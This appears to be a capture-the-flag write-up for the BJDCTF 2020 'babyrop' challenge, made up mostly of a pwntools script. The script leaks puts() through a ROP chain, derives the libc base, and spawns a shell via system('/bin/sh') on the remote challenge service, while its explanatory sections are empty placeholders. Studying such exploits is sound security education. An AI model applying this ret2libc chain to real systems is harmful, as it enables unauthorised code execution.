Problem: [BJDCTF 2020]babyrop
[[toc]]
思路
- 解题大致思路
EXP
- 具体攻击代码
# Exploit script for the [BJDCTF 2020]babyrop challenge (x86-64 target, see the 0x4000xx addresses).
# Stage 1 leaks the runtime address of puts() through a short ROP chain and returns to main;
# stage 2 reuses the same overflow to call system("/bin/sh") at addresses derived from that leak.
# NOTE(review): the hard-coded 0x4000xx gadget addresses only work for a non-PIE binary, and the
# fixed 40-byte offset with no canary leak only works without a stack protector — PIE and stack
# canaries are the mitigations this chain assumes are absent; presumably confirmed by checksec
# in the write-up, not by this script.
from pwn import *
from LibcSearcher import *  # libc offset lookup keyed on one leaked symbol address
context.log_level = "debug"  # log every byte sent/received; helps when the leak parsing goes wrong
# context.arch = 'amd64'
p = remote('node4.anna.nssctf.cn', 28453)  # remote challenge service; the commented process() line is the local variant
# p = process('./pwn')
elf = ELF('./pwn')
ret_addr = 0x04004c9  # lone `ret` gadget; presumably used for 16-byte stack alignment before system() — TODO confirm
pop_rdi = 0x400733  # `pop rdi; ret` gadget: loads the first SysV argument register
main_addr = 0x4006AD  # return into main after the leak so the overflow can be triggered a second time
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']  # GOT slot holding the resolved libc address of puts (the value leaked below)
print(hex(puts_got))
# Stage 1: 32 bytes of buffer + 8 bytes of saved rbp = 40 bytes up to the saved return address
# (offset taken from the write-up; not derivable from this script alone). Chain: puts(puts_got) -> main.
payload = b'a'*32+b'b'*8+p64(pop_rdi)+p64(puts_got) + p64(puts_plt)+p64(main_addr)
p.sendlineafter('Pull up your sword and tell me u story!', payload)  # pwntools expects bytes here; newer versions warn on str
# A user-space x86-64 address has 6 significant bytes with 0x7f on top; read up to that byte,
# keep the last 6, and zero-extend to a u64.
puts_addr= u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc = LibcSearcher('puts',puts_addr) # ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
libc_addr = puts_addr - libc.dump('puts')  # libc base = leaked runtime address - symbol offset in that libc
bin_sh_add=libc_addr+libc.dump('str_bin_sh')
system_add=libc_addr+libc.dump('system')
# Stage 2: same 40-byte overflow; `ret` first, then system("/bin/sh") with rdi set via pop rdi.
payload=b'a'*(32+8)+p64(ret_addr)+p64(pop_rdi)+p64(bin_sh_add)+p64(system_add)
p.sendlineafter('Pull up your sword and tell me u story!',payload)
p.interactive()  # hand the connection over to the user
总结
- 对该题的考点总结
